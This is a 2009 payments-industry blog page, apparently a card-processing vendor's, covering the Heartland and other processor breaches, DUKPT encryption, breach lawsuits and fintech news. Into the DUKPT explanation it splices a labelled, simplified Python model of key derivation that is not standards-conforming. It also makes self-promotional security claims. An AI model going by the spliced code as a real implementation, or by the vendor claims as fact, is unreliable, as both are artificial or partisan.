Saturday, February 28, 2009

Hacked! Is Visa Next?

In an article scheduled for next month's Bank Technology News, Rebecca Sausner talks about the call and the need for systematic reform in the payments industry. The main theme of the article is the adoption of an End (Beginning) to End Encryption standard.

One of the more eye-opening quotes comes from Avivah Litan, distinguished analyst from Gartner, who asks "How much worse can it get than a top 10 processor being breached? Visa's next."

Let me remind you Avivah Litan predicted that hackers would target the payment acquirers/processors months ago.  I believe it was shortly after the Hannaford breach. 

Now, with 3 processor/acquirer breaches in 3 months, it appears she's the Nostradamus of the financial transaction world. So when one of her "quatrains" predicts that "Visa's next"...I, for one, wouldn't write that off as being overly cautious (or pessimistic). HomeATM CEO Ken Mages (who's also a "see-er") saw the same writing on the wall years ago. The difference is, he was in a position to do (and has already done) something about it. Ms. Litan states that Visa needs to start seeing the same thing...or they're next.

One of the reasons HomeATM employed End to End Encryption back in January 2007 is that Ken Mages understood that without beginning to end encryption, data is ripe for the picking.

That's why HomeATM is the "only" (to our knowledge) processor who instantaneously encrypts the data at the point of sale (during the swipe) while it's inside our personal swiping device. Amusingly, ironically and paradoxically, it was his "outside the box" thinking that made him realize that encryption needs to be done "inside the box."

One of the biggest challenges HomeATM faces is overcoming the "hurdles" involved with trying to convince industry "insiders" that in order to truly secure a transaction, a hardware device is not optional,  it's necessary.  These latest breaches should make "overcoming those hurdles" a lot easier.  New Information always = New Decision(s).

One of the things we do have going for us in this "perfect storm," is that as unfortunate as these 3 processing/acquirer breaches in 3 months were, they are helping us in driving our message home. Articles like the one below don't hurt either.
These breaches should actually assist HomeATM in overcoming these hurdles... in fact, our technique(s) for securing transactions can hurdle HomeATM towards becoming an "Edwin Moses"-like talent.

Speaking of Moses...they (the breaches) may even help part the read/see and get HomeATM to the promised land sooner. (Editor's Note: Edwin Moses overcame hurdles {for 122 straight wins} during a 9 year, 9 month and 9 day "run.")

I find it heartening that HomeATM's approach to securing/encrypting data for transactions (since 1/2007) also involved a 9/9/9...99.9 Sigma.

Like Edwin Moses, we WILL win (with PIN). The hackers don't hurt by "running" right through a processor's so-called security protocols. Here's an excerpt from the article:

Heartland's Lonely Quest For Reform
Bank Technology News | March 2009

By Rebecca Sausner

Heartland Payment Systems CEO Robert Carr has likened his company's massive data breach to the Tylenol moment when product contamination led to an overhaul in packaging safety. It's likely Carr has had a few Tylenol moments himself in the past couple of months as he dealt with perhaps the largest data breach ever, though the actual number of cards compromised is undisclosed.

Now Carr is using his standing in the industry - he founded Heartland and enjoys healthy respect among processors - to call for industry-wide reform of payments technology and information sharing about exploits to prevent criminals from successfully deploying the same hack on multiple targets.

Lots of industry players agree with his stance, but there's been scant input thus far from the industry's most influential parties: including titans such as MasterCard, Discover and Visa, which are mostly mum on the subject.

"Our concern is that an underlying principle of PCI compliance is that data can be held in its native form - unencrypted - as long as it is properly protected within a corporate firewall," says Bob Baldwin, CFO of Heartland. Corporate firewalls are only as strong as their weakest link. "What we're trying to do in end-to-end encryption is have the data always remain in its encrypted form from the moment of the swipe to the moment it gets to the association." (Editor's Note: that's going to be the biggest challenge, as it will require the ecosystem of the payments landscape to be rebuilt.)

It's easy to make a case that the Heartland breach should be a louder call for industrywide action than Hannaford or TJX. The company is one of the leading processors, moving 11 million transactions each day, and was known to have invested heavily in its security. And, it had passed its latest PCI audit.

"I think it's more serious, how much worse can it get than a top 10 processor?" says Avivah Litan, Gartner vp. "Plus, it's a much bigger target. Visa's next."

Litan's in agreement with Carr that now's the time for the industry to pony up for end-to-end encryption. Some POS terminals can already encrypt data (Editor's Encryption Note 1: Our PIN Entry Device was manufactured from "beginning to end" to do so), processors can encrypt data while it's in their environment (Editor's Encryption Note 2: HomeATM not only "can" but DOES) and issuers could "theoretically" accept encrypted data and decrypt it in their environment.

Editor's Encryption Note 3: That's the beauty of our's not theoretical, it's reality. PINs remain encrypted all the way through the process...and not only is a KEY required by the processor to decrypt it, but HomeATM uses DUKPT ("DuckPut"), which creates a "UNIQUE" key for every transaction. In the extremely unlikely event "one key" is somehow obtained, only one transaction is put at risk because there's a new key for the next one.

For those interested, here's a quickie lesson.  Others, scroll down, my rant continues...

In cryptography, Derived Unique Key Per Transaction (DUKPT) is a key management scheme in which, for every transaction, a unique key is used which is derived from a fixed key. Therefore, if a derived key is compromised, future and past transaction data are still protected since the next or prior keys cannot be determined easily. DUKPT is specified in ANSI X9.24 part 1.

DUKPT allows the processing of the encryption to be moved away from the devices that hold the shared secret. The encryption is done with a derived key, which is not re-used after the transaction. DUKPT is used to encrypt electronic commerce transactions. While it can be used to protect information between two companies or banks, it is typically used to encrypt PIN information acquired by Point-Of-Sale (POS) devices.

DUKPT is not itself an encryption standard; rather it is a key management technique. The features of the DUKPT scheme are:
  • enable both originating and receiving parties to be in agreement as to the key being used for a given transaction,
  • each transaction will have a distinct key from all other transactions, except by coincidence,
  • if a present key is compromised, past and future keys (and thus the transactional data encrypted under them) remain uncompromised,
  • each device generates a different key sequence,
  • originators and receivers of encrypted messages do not have to perform an interactive key-agreement protocol beforehand.
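The following is a runnable model of the scheme the lesson above describes, added here as an illustration; it is not HomeATM's code, not from the article, and not a conforming ANSI X9.24 implementation. It keeps the X9.24 structure (a Base Derivation Key held only by the host, an Initial PIN Encryption Key injected into each device, a 21-bit transaction counter carried in the Key Serial Number, and per-transaction keys derived by walking the counter's set bits through a one-way function) but substitutes HMAC-SHA256 for the standard's TDES-based non-reversible function and a key-derived XOR pad for the TDES PIN-block cipher. The BDK, KSNs and PIN block are constructed values, and the `PinPad`, `nrf` and `host_decrypt` names are this example's own. What it demonstrates is each bullet in the list: both sides agree on the key from the KSN alone, every counter value yields a distinct key, two devices sharing a BDK get different key sequences, and no interactive agreement takes place.

```python
"""DUKPT-style key management, as a runnable model (added example, not HomeATM's code
and not a conforming ANSI X9.24 implementation).  HMAC-SHA256 stands in for the TDES
non-reversible function and an XOR pad for the TDES PIN-block cipher; the structure
(BDK -> IPEK -> per-transaction key via the KSN counter) follows X9.24 part 1."""
import hashlib
import hmac
from typing import Dict, Tuple

COUNTER_BITS = 21
COUNTER_MASK = (1 << COUNTER_BITS) - 1
MAX_SET_BITS = 10   # X9.24 skips counter values with more than ten 1-bits (bounds derivation work)
KSN_LEN = 10        # an X9.24 KSN is 80 bits: device identification bits + 21-bit counter


def nrf(key: bytes, ksn: int) -> bytes:
    """Non-reversible function: child key from (parent key, KSN).  The only property the
    scheme relies on is that the output reveals nothing about the parent key."""
    return hmac.new(key, ksn.to_bytes(KSN_LEN, "big"), hashlib.sha256).digest()[:16]


def derive_ipek(bdk: bytes, ksn: int) -> bytes:
    """Initial PIN Encryption Key injected into one device: NRF(BDK, KSN with counter zeroed).
    Devices sharing a BDK still get different IPEKs because their device-ID bits differ."""
    return nrf(bdk, ksn & ~COUNTER_MASK)


def derive_transaction_key(ipek: bytes, ksn: int) -> bytes:
    """Walk the counter's set bits from MSB to LSB; at each set bit feed the running key and
    the KSN truncated to the bits consumed so far into the NRF.  Counter 0b101 thus yields
    NRF(NRF(IPEK, base|0b100), base|0b101).  Every step is one-way, so a leaked transaction
    key gives no path back to IPEK and none sideways to the keys of other transactions."""
    base, counter = ksn & ~COUNTER_MASK, ksn & COUNTER_MASK
    key, consumed = ipek, 0
    for bit in range(COUNTER_BITS - 1, -1, -1):
        if counter & (1 << bit):
            consumed |= 1 << bit
            key = nrf(key, base | consumed)
    return key


def next_counter(counter: int) -> int:
    """Advance the counter, skipping values with more than MAX_SET_BITS ones; once the 21-bit
    space is used up the device must be re-injected with a fresh IPEK."""
    counter += 1
    while counter <= COUNTER_MASK and bin(counter).count("1") > MAX_SET_BITS:
        counter += 1
    if counter > COUNTER_MASK:
        raise RuntimeError("DUKPT key space exhausted; re-inject device")
    return counter


def _xor_pad(key: bytes, data: bytes) -> bytes:
    """Stand-in for TDES on the 8-byte PIN block: XOR with a pad derived from the transaction key."""
    pad = hmac.new(key, b"pin-block-pad", hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(data, pad))


class PinPad:
    """Device side.  Simplification: a real X9.24 device erases IPEK after filling its
    future-key registers so that even device capture exposes no past keys; this model
    keeps IPEK in memory to stay short."""

    def __init__(self, ipek: bytes, initial_ksn: int) -> None:
        self.ipek = ipek
        self.base = initial_ksn & ~COUNTER_MASK
        self.counter = 0

    def encrypt_pin_block(self, pin_block: bytes) -> Tuple[int, bytes]:
        """Returns (KSN, ciphertext).  The KSN travels in the clear; it names the key
        without revealing it."""
        self.counter = next_counter(self.counter)
        ksn = self.base | self.counter
        return ksn, _xor_pad(derive_transaction_key(self.ipek, ksn), pin_block)


def host_decrypt(bdk: bytes, ksn: int, ciphertext: bytes) -> bytes:
    """Host side: no interactive key agreement; the received KSN plus the BDK re-derives
    exactly the key the device used."""
    return _xor_pad(derive_transaction_key(derive_ipek(bdk, ksn), ksn), ciphertext)


def demo() -> Dict[str, bool]:
    """Constructed test values: the BDK, both device KSNs and the PIN block are made up."""
    bdk = bytes.fromhex("0123456789abcdeffedcba9876543210")
    ksn_a, ksn_b = 0xFFFF9876543210E00000, 0xFFFF9876543211E00000  # two devices, same BDK
    pad_a = PinPad(derive_ipek(bdk, ksn_a), ksn_a)
    pad_b = PinPad(derive_ipek(bdk, ksn_b), ksn_b)
    pin_block = bytes.fromhex("041234ffffffffff")  # dummy ISO format-0-style PIN block

    txns = [pad_a.encrypt_pin_block(pin_block) for _ in range(3)]
    keys_a = [derive_transaction_key(pad_a.ipek, ksn) for ksn, _ in txns]
    ksn_b1, _ = pad_b.encrypt_pin_block(pin_block)
    return {
        "host_recovers_pin": all(host_decrypt(bdk, k, c) == pin_block for k, c in txns),
        "unique_key_per_txn": len(set(keys_a)) == len(keys_a),
        "unique_ciphertexts": len({c for _, c in txns}) == len(txns),
        "devices_differ": keys_a[0] != derive_transaction_key(pad_b.ipek, ksn_b1),
    }


if __name__ == "__main__":
    print(demo())
```

Running the file prints four booleans, all true. The design point worth noticing is that the host never stores per-device keys: it keeps one BDK and recomputes whatever key a KSN names, which is why the scheme scales to a fleet of terminals without any key-agreement traffic. The property the editor's note leans on (one leaked key exposes one transaction) comes from the one-way derivation step, not from the cipher; the device-side caveat is that it only holds in full when the terminal discards IPEK, which this model does not do.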
The problem is without an agreed-upon standard - though triple DES would likely work - (Editor's Encryption Note 4: HomeATM uses Triple DES (3DES)) there are "air gaps" between each of the players that even PCI doesn't address.

Still, it'd likely be worth the trouble.

Editor's Encryption Note 5: It WAS worth the trouble; in fact, that isn't what troubled us...what's troubling is that it seems like it's taking forever getting others (payment industry pros) to understand what is written in this article...(maybe because it's written in "clear text.")

What we need is an Edwin Moses approach to overcoming the hurdles involved with "parting that read/see" and getting industry insiders to "read" further into the risks mitigated by PIN and "see" what Avivah Litan sees.

"I would say the cost of putting end-to-end encryption in place would be lower than the all the PCI security costs and the breaches," Litan says.

Editor's Encryption Note 6: Ya think? Now if we can only get "DUH!" so-called industry experts/insiders to see it that way... About the only thing HomeATM puts out there in "clear text" is that "PIN Based 3DES DUKPT Encryption is the most secure way to process a transaction." Beginning to End Encryption.

Want to learn more about our Tales from Encrypt? Contact us and we'll tell you all about it...from Beginning to End!

Continue Reading at Bank Technology News


Visa: New Payment Processor Breach Not New

The new processor breach that has had everyone speculating over the past 2 weeks... is "not new" according to Visa. 

Everyone else's (100,000,000 plus cards) card information has not been kept a secret, yet the "identity" of the processor who let the hacking world into theirs HAS been.   Visa has already publicly stated that  this "new" breach was "unrelated to the Heartland breach," so that leaves only one processor in the running.  RBS Worldpay.  Developing...

Here's the story from Computerworld:

Visa: New payment-processor data breach not so new after all

February 27, 2009 (Computerworld) Days after Visa Inc. seemingly confirmed that a data breach had taken place at a third payment processor, following on the recent breach disclosures by Heartland Payment Systems Inc. and RBS WorldPay Inc., the credit card company is now saying that there was no new security incident after all.

In actuality, Visa said in a statement issued today, alerts that it recently sent to banks and credit unions warning them about a compromise at a payment processor were related to the ongoing investigation of a previously known breach. However, Visa still didn't disclose the identity of the breached company, nor did it say why it is continuing to keep the name under wraps.

Visa said that it had sent lists of credit and debit card numbers found to have been compromised to financial institutions "so they can take steps to protect consumers." The company added that it currently "is risk-scoring all transactions in real time, helping card issuers better distinguish fraudulent transactions from legitimate ones."

Visa's latest statement follows ones that both it and MasterCard International Inc. issued earlier this week in response to questions about breach notices that had been posted by several credit unions and banking associations. The notices made it clear that they weren't referring to the system intrusion disclosed by Heartland on Jan. 20 and suggested that a new breach had occurred.

Visa's initial statement and the one from MasterCard were both carefully worded; neither said specifically that the breach being referred to was a new one, but they also didn't say that it was a previously disclosed incident. Visa said it was "aware that a processor has experienced a compromise of payment card account information from its systems," while MasterCard said it had notified card issuers of a "potential security breach" affecting a payment processor in the U.S.

MasterCard officials didn't respond today to requests seeking clarification on whether its statement referred to a previous breach or a new one.

Benson Bolling, vice president of lending at the Alabama Credit Union in Tuscaloosa, said today that officials there had understood the breach to be a new one based on the alerts sent out by Visa — but couldn't say that for sure. According to Bolling, the credit union, which posted an advisory on Feb. 17 and updated it two days later, was informed by Visa of a "big breach" shortly after getting the word about the intrusion at Heartland.

The identifying number that was used in the so-called Compromised Account Management System alert issued by Visa appeared to suggest a new breach, because it was different from those used in previous CAMS notices, Bolling said. It was his understanding, he added, that CAMS alerts related to a previous breach would use the same identifier as the original notifications...

Continue reading at Computerworld.

Friday, February 27, 2009

Finovate Startup09 Company Descriptions

Finovate Startup Conference Company Descriptions (NetBanker)
By Jim Bruene

To give you an idea of the types of innovations being funded in financial services these days, here's a capsule description of the first 48 companies demoing at FinovateStartup April 28 in San Francisco.

Attention attendees: You have just one day left to register at the discounted price of $795.

Finovate Startup 2009 Participants

Acculynk is a payments solutions provider with a suite of software-only services that secure online transactions by utilizing a graphical, scrambling PIN-pad for the secure entry of sensitive cardholder information.

AlphaClone is a web-based investment research service that lets users explore the investing ideas of top hedge fund and institutional money managers.

Aradiom is a mobile solutions provider and designer of Java mobile applications and platform development technology including turn-key applications, embedded soft-token security solutions and BlackBerry® enterprise applications.

BillShrink is a personalized savings advisor that helps consumers make smart, money-saving decisions by providing continuously updated, personalized, usage-based recommendations on everyday services like credit cards and cell phone plans

BudgetTracker is a personal finance manager that allows users to manage their finances and keep track of their budget, bills, and transactions online without having to install software.

CalendarBudget is a free online personal budgeting tool that helps users organize and track their finances, plan future spending and save money.

Centrro is a financial search engine that allows consumers to anonymously shop for personal financial products that best fit their specific credit profile.

CircleUp provides group communications services, which enable actionable and efficient interactions across diverse social, email, mobile, messaging and private web networks.

Cooler Inc.
Cooler Inc. enables users to know, decrease, and offset the global warming impact of their everyday purchases and activities by using the country's only peer-reviewed carbon calculator to calculate impact and then providing reductions targets and strategies, and offering recommendations on high quality carbon offsets.

CreditArray is a vault of proprietary information to allow consumers to better apply for and manage their credit portfolios.

Credit Karma
Credit Karma provides consumers free access to their credit score and offers credit simulators, advice, and credit score comparison tools in order to allow them to more actively manage their credit and financial health.

GoalSpring's product, DebtGoal, makes paying down debt as easy and efficient as possible by taking into account all of a customer's debt and helping them organize, optimize and pay it down.

Expensify simplifies keeping track of business expenses by combining an electronic payment card and a web-based expense manager to automate expense report preparation, approval, and reimbursement.

Green Sherpa
Green Sherpa offers personal cash flow management software that lets users conveniently download, manage and update all their financial accounts via a single online resource.

Home-Account is in stealth mode at this time.


HomeATM provides a secure PIN debit and PIN credit card transaction method via the Internet that utilizes the HomeATM swipe pad technology to allow users to conduct secure PIN-based transactions from home, ensuring virtually zero fraud and lower merchant processing fee costs.

iBearSoft is the creator of iBearMoney, a personal finance application for the iPhone that allows users to input and categorize their transactions, run financial reports, analyze payments, and keep track of expenses.

iThryv is a financial literacy platform that combines a content delivery system and an incentive system in order to create an immersive learning environment which provides a powerful tool when used in partnership with online banking and core providers.

Jwaala provides software for banks and credit unions that improves their online banking services. Their MoneyTracker application offers a personal financial management solution that can be added to any bank or credit union's existing online banking solution.

kaChing is a social investment community that applies an open source and social-networking strategy to offer every investor the opportunity to find outstanding investors, emulate their portfolios, and access the returns, insights, transparency and talent previously only available to wealthy individuals.

Kapitall is a rich web application that aims to make investing easy for everyone. Inspired by game design, Kapitall combines a graphical user interface with tools that make it easier than ever to research companies, build portfolios, share ideas and get smarter about the market.

Lending Club
Lending Club is an online social lending network where people can borrow and invest money at attractive rates.

LendingKarma is a person-to-person lending site that makes it easy for parties that know each other to create loans and provides borrowers and lenders with tools to help service the loan and see it through to repayment. enables people to manage their finances online using an open source financial platform that allows developers to build sophisticated applications which will help users enhance their experience and increase the efficiency of the service.

Mint is an online personal finance service that securely downloads users' financial transactions, allows them to categorize their transactions, provides a unified view of all account activity and relevant account alerts, and offers personalized suggestions for significant savings opportunities.

Moneta provides a secure, quick and easy form of online payment that directly debits users' checking or money market account allowing users to only enter a secure username and password when making online purchases.

NCore provides enterprise class delivery channel solutions to financial institutions within the Asia Pacific and Middle East regions fusing applications, innovative security and middleware technology into a single integrated platform.

OurCashFlow offers personal finance management tools for financial institutions that can turn their website into a place where customers can create a budget, save money and achieve their savings goals.

Pennyminder helps individuals and small groups manage their shared and personal finances by tracking deposits and withdrawals, allowing them to see what's happening with their money.

People Capital
People Capital is a peer-to-peer private student loan service that utilizes a unique scoring system to predict a student's potential and provide a true, unbiased measure of the economic value of an education that empowers students to make better educational decisions and offers multiple advantages for both borrowers and lenders.

Pertuity Direct
Pertuity Direct offers social lending for personal loans by bringing together the advantages of capital markets, social networks and traditional banking.

Portfolio Monkey
Portfolio Monkey provides free online portfolio management tools to help average investors optimize their portfolios and find customized investment ideas so they can create more efficient portfolios with higher expected return and less risk.

Prosper is a person-to-person lending marketplace where people list and bid on loans using Prosper's online auction platform.

The Receivables Exchange
The Receivables Exchange is a real-time online market for trading accounts receivable that gives businesses access to working capital at a competitive cost by connecting a global network of accredited investors to the nation's small and mid-sized businesses.

Rudder is a free personal finance software designed to minimize the effort required in managing money by helping users to manage their budget, track their bills and analyze their expected income and projected expenses.

Silver Tail Systems
Silver Tail Systems provides fraud prevention to defend users' websites against business logic abuse through the use of behavior detection, efficient investigation and real-time mitigation to track suspicious behavior and divert the bad actors, leaving legitimate users unaffected.

SimpliFi provides independent financial advice online. Users can complete a profile and receive a personal financial plan with specific actionable steps.

SmartHippo uses the power of the community to find users the best rates on financial products and services.

SmartyPig is a social saving service that helps users save for a specific goal by allowing them to invite others to contribute to their account, providing incentive boosts from top retailers, and offering a competitive interest rate.

moneyStrands is a money management service that helps users get information on anything from practical savings tips to getting help tracking expenses down.

Syphr is a technology and marketing credit union service organization that created RateMatch, a service that matches participating credit unions with the thousands of credit report purchasers per month.

ThreatMetrix helps companies control online fraud and abuse in real time by profiling the device used in an online transaction so companies can determine whether the users are fraudsters or customers.

Transparent Financial Services
Transparent Financial Services is an online comparison-shopping service for small businesses that uses technology to help users compare and purchase financial services like payroll processing, credit card processing and business loans.

Victrio offers a credit risk management system that uses voiceprint recognition technology to fight credit card fraud and identity theft.

Wesabe is an online personal finance management tool that provides members with information about where they spend and links them with a community dedicated to helping each other make smart financial decisions.

WeSeed seeks to demystify the stock market by helping real people share what they know and make smart investing decisions based on the collective wisdom of the community.

ZimpleMoney is a web-based financial services platform enabling people and organizations to manage and administer financial agreements including loans, leases, rentals, tithing, trusts and settlements.


Visa Survey Reveals Many SME's Believe They Are too Small to Attract Fraudsters

Fraud Prevention Month activities highlight importance of data security for small businesses in Canada

TORONTO, Feb. 27 /CNW/ - A survey of Canadian small businesses released today by Visa reveals that 41 per cent of respondents believe that 'data thieves and hackers' are not interested in targeting their businesses because of their size.  

As part of its annual Fraud Prevention Month activities, Visa is hosting free fraud prevention seminars in Toronto, Ottawa, Winnipeg and Calgary that will emphasize the importance of data security for small businesses.

"Regardless of the size of the enterprise, it's important for business owners to appreciate the importance of data security and what steps they should take to protect their customers and business," says Gord Jamieson, Head of Payment System Risk, Visa Canada. "The information sessions will provide a great deal of information and an opportunity for small business owners and managers to ask questions."

The Ipsos Reid survey, which was commissioned by Visa Canada, surveyed 885 small business owners about their data storage and security practices.

39 per cent of respondents describe securing customer information as a vital part of their business and 94 per cent believe that securing data is important to their customers. Of the 60 per cent of respondents that do keep electronic files with customer information, 86 per cent noted that they either encrypt the data (8 per cent), ensure that it is password protected (39 per cent) or ensure that the information is both encrypted and password protected (39 per cent).

While the majority of respondents claim to appreciate the importance of data security to their business and customers, more than half (52 per cent) have never sought information about how to properly secure electronic information and 24 per cent do not know where to get information about how to better secure information for their business.

"Preventing fraud is a shared responsibility," says Jamieson. "By offering information to small businesses during Fraud Prevention Month, we can help them better protect themselves against data thieves."

The Visa Canada workshops will help educate small businesses about how to better protect themselves from fraudsters. Sessions will include information on how to properly process a credit card transaction, tips on how to protect credit card information and to ensure that their payment application is secure, chip and PIN technology, and an overview of the Visa Account Information program. More information and free registration is available online at In addition, through its participation in the Fraud Prevention Forum, Visa works closely with government and law enforcement to provide educational materials to all Canadians to help them "recognize, report and stop" fraud. Educational materials for consumers and merchants on fraud prevention can be found on

About the Survey

The online survey was conducted between February 2 and 9, 2009, by Ipsos Reid. A total of 885 small and medium sized business owners who employ 1-250 employees and accept credit or debit cards were surveyed. An unweighted probability sample of this size, with 100 per cent response rate, would have an estimated margin of error of plus or minus 3.3 percentage points, 19 times out of 20. Margin of error for subgroups will be larger.

About Visa

Visa Inc. operates the world's largest retail electronic payments network providing processing services and payment product platforms. This includes consumer credit, debit, prepaid and commercial payments, which are offered under the Visa, Visa Electron, Interlink and PLUS brands. Visa enjoys unsurpassed acceptance around the world, and Visa/PLUS is one of the world's largest global ATM networks, offering cash access in local currency in more than 170 countries. For more information, visit

For further information: Sarah Van Lange, Fleishman Hillard, (416) 645-8173,; Carla Morin, Visa Canada, (416) 860-8850,

Source: VISA INC.


Banks File Class Action Against Heartland

Bank Info Security, which has been covering the Heartland Breach better than most any other site I have found, is now reporting that a class action lawsuit has been filed against the company on behalf of the banking institutions.

Saw this coming from a mile away...(see: Banks Not HPY with Heartland)  This is just the beginning folks.  If I owned shares in Heartland, I wouldn't be HPY.

In one lawsuit, the Lone Star National Bank is asking for $50 million in damages. Damages will most likely be trebled. This has got to be giving Heartland a bad ticker...speaking of which, I haven't had an opportunity to check their stock price yet today...hold on..let me grab it for you...

In the meantime, you can click on the graphic to enlarge if you can't read it...

Here ya's a little off from its 52-week high...yes? Heartland says it will meritoriously defend itself against any lawsuit, which I take to mean that it will file a counter-suit against the brands (V/MC) claiming the breach was their fault because they don't provide end-to-end encryption.

IMHO, if Visa and MasterCard would simply take the reduced Interchange Fees hit and get rid of (completely eliminate) signature debit...and completely replace it with the more secure PIN Debit platform, this dog wouldn't be barking.

Here's the report from Bank Info Security:

Heartland Data Breach: Class Action Suit Filed on Behalf of Banking Institutions

Complaint Seeks to Recover Costs, Damages from Fraud
February 27, 2009 - Linda McGlasson, Managing Editor

One month after the Heartland Payment Systems (HPY) data breach was revealed, a Philadelphia law firm filed a class action lawsuit against the processor on behalf of two banks and three credit unions. The complaint was filed by Chimicles & Tikellis in U.S. District Court in Trenton, NJ on February 20. (Click the graphic below to enlarge and read the treble damages request)

The five institutions named in the complaint are Amalgamated Bank, New York, NY; Matadors Community Credit Union, Chatsworth, CA; GECU, El Paso, TX; MidFlorida Federal Credit Union, Lakeland, FL; and Farmers State Bank, Marcus, IA. All the institutions say they have had to re-issue "substantial" numbers of credit and debit cards because of the Heartland breach.

Joseph Sauder, the (soon to be rich) attorney leading the case, says while only five institutions were named in the complaint, "We talked with numerous banks. These five were the ones we selected to present in the complaint."

Although no one has estimated officially how many institutions, cards and consumers might be affected by the breach, more than 500 institutions have stepped forward to tell Information Security Media Group that they have been impacted.

Chimicles & Tikellis also has a consumer class action lawsuit filed against Heartland, filed in the same U.S. District Court in Trenton on January 27.

Seeking to Recover Costs

In the new class action suit, Sauder says the institutions "seek to recover money for the cost of reissuing cards and also for the fraudulent activity that banks and credit unions are ultimately responsible for as a result of this breach, among other things."

Heartland announced on January 20 that its computer systems had been breached by outside hackers sometime in 2008. The processor handled on average 100 million transactions per month for about 175,000 merchants and retail establishments. Heartland only became aware of the breach after it was notified by Visa and MasterCard of "patterns of fraudulent credit card activity," the lawsuit states.

The breach compromised information including debit and credit card numbers, expiration dates and internal bank codes. Many of the institutions that had cards compromised in the breach were forced to re-issue new credit and debit cards to their customers. "Given the large size of the data breach, the expenses associated with doing so are substantial," the complaint says, "and include costs for purchasing new plastic debit and credit cards, postage and other mailing expenses, time spent by employees addressing this issue and harm to reputation and goodwill."

Many institutions have also reported incidents of fraud, the complaint states. It says Heartland's actions "constitute violations of the consumer protection statute of New Jersey," and amount to a breach of implied contract, negligence, negligent misrepresentation, and common law negligence.

Sauder says he cannot estimate how soon the case may begin or how long it may last. "It's hard to tell at this time, since the case was just filed, as to what Heartland's position is going to be," he says. He adds that more institutions are expected to join the class action suit.

Other Suits

There are at least three consumer class action lawsuits filed against Heartland and three other lawsuits filed in other courts by institutions seeking to recoup their losses and expenses related to the breach:
  • The Lone Star National Bank, Pharr, TX has filed a lawsuit seeking $50 million in damages against Heartland. The Lone Star case was filed in Texas Southern District Court on February 16.

  • TriCentury Bank, Simpson, KS filed a lawsuit in New Jersey District Court on February 13 seeking a judgment against the payments processor for breach of contract.

  • Lone Summit Bank, Lake Lotawana, MO filed a lawsuit in the Fraud or Truth-In-Lending office of the New Jersey District Court on February 6.

The lawsuits against Heartland aren't the only issues the payments processor is confronting. During a conference call reporting Heartland's 2008 fourth quarter earnings on February 24, Heartland President and CFO Bob Baldwin said, "Today, we have had several lawsuits filed against us and we expect that additional lawsuits will be filed. We are also subject to several governmental investigations and enquiry, including an informal enquiry by the SEC and a related investigation by the Department of Justice, an inquiry by the OCC, and an inquiry by the FTC, and we may, in the future, be subject to other governmental enquiries and investigation."


Experts Publish 20 Guidelines to Halt Data Breaches

NOTICE to readers of this draft document: Criticisms and suggestions are strongly encouraged. If you are actively engaged in cyber forensics, red teams, blue teams, technical incident response, vulnerability research, or cyber attack research or operations, please help make sure this document is as good as it can be. Send criticism/comments/suggestions to John Gilligan as well as to by March 25, 2009.

Twenty Most Important Controls and Metrics for Effective Cyber Defense and Continuous FISMA Compliance


Mobile Banking to Top $5.5 Billion in 2013

By Jason Ankeny

Consumers will conduct almost 300 billion mobile payment and banking transactions worth more than $860 billion in 2013, a twelve-fold increase in gross global transaction values in five years, according to a new forecast published by market research firm Informa Telecoms & Media. Informa contends that if key players collaborate effectively, the mobile payments and banking market offers a shared annual revenue opportunity of more than $10 billion in 2013, galvanized by m-banking services, which are expected to contribute $5.5 billion of that amount. Informa predicts that in four years' time, more than 445 million mobile subscribers worldwide will regularly use their mobile phone to purchase physical goods and services remotely--the report estimates that while the value of mobile payments and transactions in 2008 totaled around $71 billion, a third of which was spent on mobile digital content like ringtones, games and full-track downloads, physical goods and services will represent about 95 percent of mobile transactions by 2013.

Informa forecasts there will be 977 million worldwide users of mobile banking services by 2013, up from about 67 million at the end of 2008. In addition, almost 424 million consumers will transmit more than $157 billion of personal funds via mobile domestically by 2013, with another 73 million sending $48 billion internationally. However, Informa anticipates near-field communications payment models will be held back by the lack of availability of NFC-enabled handsets and related uncertainties concerning the overall business case for mobile NFC. Even so, Informa believes approximately 11 percent of all mobile handsets shipped in 2013 will be NFC enabled, with more than 178 million mobile subscribers regularly using mobile NFC phones to acquire physical goods and services, such as tickets, at the point of sale.

Informa credits the growth of mobile payments to drivers and enablers including more sophisticated handsets and network technologies, a more enlightened regulatory perspective on mobile banking, consumer familiarity and increased investment across the ecosystem. The report concedes that uncertainties remain, in particular the global financial meltdown as well as a crisis in consumer confidence triggered by widespread turmoil throughout the banking industry.

For more on the Informa forecast: read this release

Related articles:
Bill Gates pledges $12.5 million for mobile banking
MMA publishes Mobile Banking Overview

Whitepaper - Mobile Banking in the United States

Blackberry Whitepaper: Mobile Banking in the United States – The Evolution of Anywhere Banking
Technological, economic and market factors have enabled a new breed of customers. Find out how the banking industry can leverage this new channel.

* Download Now (PDF), or to see only their conclusion, click the image below and it will enlarge enough to read


Moneris Awards Verifone $10M EMV Terminal Contract


Bank-backed Canadian card payments processor Moneris is gearing up for the country's migration to EMV by awarding eftpos vendor Verifone a $10 million contract for the supply of terminals.

More on this story:

Pago Retail Report 2008 Press Release

(In Europe) Credit card increases lead over other payment methods in online retailing

Latest Pago Retail Report by Deutsche Card Services shows significant differences in payment behaviour between online retailing and e-commerce as a whole

COLOGNE, 27 February 2009 - As in overall e-commerce, credit cards are clearly the preferred payment method in European retailing. Their share rose almost 6 pp year-on-year, to now 81.57%. In other words: Consumers use credit cards to pay for more than eight out of ten purchases in European online retailing. This is one of the results explained in the Pago Retail Report 2008, which was recently published by Deutsche Card Services, a subsidiary of Deutsche Bank

(Editor's Note: These numbers are skewed because PIN Debit is not ubiquitous on the web.  For "across the board" numbers, visit "Debit is King, Cash Overthrone")

Offline payment methods and direct debiting lose importance in favour of credit cards

Despite the predominance of credit cards offline payment methods such as invoice purchases, COD and prepayment as well as direct debiting still play a more important role in online retailing than in overall e-commerce (payment behaviour in overall e-commerce is described in detail in the Pago Report 2008).

Just like the sector-specific Pago Retail Report 2008, the Pago Report 2008 is based on real-life transactions, not on surveys. That is what makes the Pago Reports different from other e-commerce studies. The report highlights that 5.04% of all retail transactions were paid for by offline methods and 11.97% by direct debiting.

The shares of these payment methods in overall e-commerce are only 0.77% and 8.34%, respectively. However, offline payment and direct debiting lose ground to credit cards in online retailing; in fact, the latter increased their lead, largely due to the success of Visa, whose share rose by more than 4%, whereas competing credit card brand MasterCard lost more than 2%.

Consumers from the UK and from outside Europe pay almost exclusively by credit card

